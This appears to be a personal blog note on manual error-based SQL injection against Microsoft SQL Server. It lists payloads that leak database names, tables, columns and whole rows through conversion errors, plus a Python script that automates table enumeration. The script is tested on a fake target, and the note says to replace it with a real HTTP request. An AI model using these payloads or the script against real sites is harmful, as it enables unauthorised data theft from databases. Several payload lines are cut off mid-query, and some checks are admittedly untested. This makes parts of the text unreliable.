Until now I had always just run tools against MSSQL injection points, but some injection points crash the tool the moment it scans them, and when it matters you still have to inject by hand, so I studied and summarized MSSQL manual injection and wrote this as a note. This post mainly covers error-based injection!
payload:
?Id=admin' and 1=convert(int,(SQL statement)) AND 'CvNI'='CvNI
How it works: convert(int, ...) fails on a string that is not a number, and SQL Server's error text quotes the value it could not convert ("Conversion failed when converting the nvarchar value '...' to data type int"), so whatever the inner SQL statement returns is echoed back on the error page. The inner statement must return a single value (one row, one column); use top 1 or FOR XML PATH('') to guarantee that.
1=convert(int,(db_name())) #get the current database name
1=convert(int,(@@version)) #get the database version
1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH(''))) #get every database in one go; quotename() wraps each name in [ ] so the boundaries stay visible in the error
1=convert(int,(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))) #get them all in one go with | as separator; %2b is the URL-encoded +, because a literal + in the query string is decoded as a space
and 1=(select IS_SRVROLEMEMBER('db_owner')) #check whether we are db_owner / sysadmin / public (did not test successfully); if the check holds the page renders normally, otherwise it does not. Caveat: this one is boolean-based rather than error-based (the function returns 1 or 0, so 1=(...) is simply true or false), and db_owner is a database role, not a server role: IS_SRVROLEMEMBER() only knows server roles such as sysadmin and returns NULL for a role name it does not recognise, so use IS_MEMBER('db_owner') for database roles.
1=convert(int,(user)) #the user the connection runs as
admin' AND 1878=CONVERT(INT,(SELECT SUBSTRING((CASE WHEN(IS_SRVROLEMEMBER('db_owner')=1)THEN '1' ELSE '0' END),1,100))) AND 'iaQQ'='iaQQ #taken from sqlmap, also not tested successfully. Same caveat as above: sqlmap uses this pattern with the server role 'sysadmin'; with 'db_owner' the CASE always yields '0'.
ps: the tests may have failed because of the environment
1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('V_ #one table at a time through information_schema.tables; the not in(...) list excludes the names already leaked
1=convert(int,(select top 1 quotename(name) from [database name]..sysobjects where name not in('table_name1','table_name2') and xtype='U')) #get table names one at a time: put each name the error leaks into the not in(...) tuple and repeat until the page stops erroring (no row left means the subquery is NULL and convert(int,NULL) raises nothing)
1=convert(int,(select quotename(name) from [database name]..sysobjects where xtype='U' FOR XML PATH(''))) #get all table names in one go; with many tables this fails, because the error message is truncated, so fall back to the one-at-a-time query
1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog='[database name]')) #the same through information_schema, filtered on the database (catalog) name; table_catalog is a string column, so the name goes in single quotes, not brackets
having 1=1 -- #HAVING without a GROUP BY makes SQL Server complain that the first selected column "is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause", and the message names it as table.column; this needs the injection point to sit in a SELECT ... FROM query, e.g. ?Id=admin' having 1=1 --
group by column_name1,column_name2 having 1=1-- #put every column leaked so far into GROUP BY and the error names the next one; repeat until the query stops erroring, at which point all columns of the queried table are known
Get the column names of any table:
1=convert(int,(select quotename(name) from [database name]..syscolumns where id =(select id from [database #syscolumns is keyed by the table's object id, which the inner subquery looks up in sysobjects by table name
1=(select top 1 * from [database name]..[table name] FOR XML PATH('')) #dump the first row of a table: FOR XML PATH('') folds the row into one string, and comparing that string with the integer 1 forces the conversion error that carries the whole row
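Doing the one-at-a-time enumeration above by hand (read the error, add the name to the not in(...) tuple, resend) is slow, and it is also the step where a scanner usually chokes. Below is an added example, written for these notes and not code from the original post or from sqlmap, of a small Python helper that builds payloads from the admin'/'CvNI' template, pulls the leaked value out of SQL Server's conversion error, and loops until the page stops erroring; it also covers the '|'+name+'|' FOR XML PATH('') one-shot variant. It assumes an Id GET parameter, the English error text SQL Server emits, and user tables in sysobjects. FakeMssqlTarget is a constructed stand-in for a vulnerable ASP page so the script runs offline; the table names in it are made up. Against a real target, replace target.send with a function that does the HTTP GET and returns the response body.

```python
import re
from urllib.parse import quote

# SQL Server's error text when convert(int, <string>) fails; group 1 is the leaked value.
CONVERSION_ERR = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int",
    re.DOTALL,
)


def build_payload(inner_sql, prefix="admin", suffix="CvNI"):
    """Wrap a scalar subquery/function in the error-based template used in the notes:
    admin' and 1=convert(int,(<inner_sql>)) and 'CvNI'='CvNI"""
    return f"{prefix}' and 1=convert(int,({inner_sql})) and '{suffix}'='{suffix}"


def url_encode(payload):
    """Encode the payload for ?Id=; '+' must become %2B or the server decodes it as a space."""
    return quote(payload, safe="")


def extract_value(response_text):
    """Return the string quoted in the conversion error, or None if no error fired."""
    m = CONVERSION_ERR.search(response_text)
    return m.group(1) if m else None


def sql_literal(s):
    """Quote a value for a single-quoted T-SQL literal (doubling embedded quotes)."""
    return "'" + s.replace("'", "''") + "'"


def enumerate_tables(send, db, limit=200):
    """One table per request with the not in(<names seen so far>) trick.
    send(payload) must return the raw response body for that injected Id value.
    When top 1 finds no row the subquery is NULL, convert(int, NULL) raises nothing
    and the page answers normally: that is the stop condition."""
    seen = []
    while len(seen) < limit:
        excluded = ",".join(sql_literal(t) for t in seen) or "''"
        inner = (f"select top 1 name from [{db}]..sysobjects "
                 f"where xtype='U' and name not in({excluded})")
        leaked = extract_value(send(build_payload(inner)))
        if leaked is None:
            break
        seen.append(leaked)
    return seen


def tables_in_one_shot(send, db, sep="|"):
    """FOR XML PATH('') variant: all table names in a single error, sep-delimited.
    On a real target a long list is cut off in the error text; then use enumerate_tables."""
    inner = (f"select '{sep}'+name+'{sep}' from [{db}]..sysobjects "
             f"where xtype='U' FOR XML PATH('')")
    leaked = extract_value(send(build_payload(inner)))
    if leaked is None:
        return []
    return [t for t in leaked.split(sep) if t]


class FakeMssqlTarget:
    """Constructed stand-in for a vulnerable page (not a real server). It recognises
    the two sysobjects queries above and replies with the '80040e07' error text an
    ASP front end prints for a SQL Server conversion failure."""

    def __init__(self, tables):
        self.tables = list(tables)  # made-up user table names

    @staticmethod
    def _error(value):
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
                f"Conversion failed when converting the nvarchar value '{value}' "
                "to data type int.")

    def send(self, payload):
        m = re.search(r"name not in\((.*?)\)", payload)
        if m:
            excluded = set(re.findall(r"'([^']*)'", m.group(1)))
            for t in self.tables:
                if t not in excluded:
                    return self._error(t)  # top 1 row -> conversion error leaks it
            return "<html>no result</html>"  # subquery NULL -> no error, page is quiet
        m = re.search(r"select '(.)'\+name\+'.' from .* FOR XML PATH\(''\)", payload)
        if m:
            sep = m.group(1)
            return self._error("".join(f"{sep}{t}{sep}" for t in self.tables))
        return "<html>no result</html>"


if __name__ == "__main__":
    target = FakeMssqlTarget(["users", "orders", "audit_log"])
    print(url_encode(build_payload("db_name()")))
    print(enumerate_tables(target.send, "testdb"))
    print(tables_in_one_shot(target.send, "testdb"))
```

The fake target is deliberately strict about the stop condition: once every table is in the not in(...) tuple it returns a normal page instead of an error, which is exactly what you see on a real server, so the loop ends on "no conversion error" rather than on a fixed count.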
https://www.cnblogs.com/beyond1983/archive/2013/04/16/3023707.html is worth reading alongside these notes (reposted)